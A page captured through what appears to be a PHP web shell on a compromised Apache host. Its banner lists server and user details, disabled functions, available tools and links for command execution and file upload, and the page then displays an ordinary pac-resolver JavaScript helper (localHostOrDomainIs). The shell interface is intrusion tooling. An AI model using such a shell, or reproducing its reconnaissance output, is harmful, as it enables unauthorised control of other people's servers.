Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/pac-resolver/dist/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); /** * Is true if the hostname matches exactly the specified hostname, or if there is * no domain name part in the hostname, but the unqualified hostname matches. * * Examples: * * ``` js * localHostOrDomainIs("www.netscape.com", "www.netscape.com") * // is true (exact match). * * localHostOrDomainIs("www", "www.netscape.com") * // is true (hostname match, domain not specified). * * localHostOrDomainIs("www.mcom.com", "www.netscape.com") * // is false (domain name mismatch). * * localHostOrDomainIs("home.netscape.com", "www.netscape.com") * // is false (hostname mismatch). * ``` * * @param {String} host the hostname from the URL. * @param {String} hostdom fully qualified hostname to match against. * @return {Boolean} */ function localHostOrDomainIs(host, hostdom) { const parts = host.split('.'); const domparts = hostdom.split('.'); let matches = true; for (let i = 0; i < parts.length; i++) { if (parts[i] !== domparts[i]) { matches = false; break; } } return matches; } exports.default = localHostOrDomainIs; //# sourceMappingURL=localHostOrDomainIs.js.map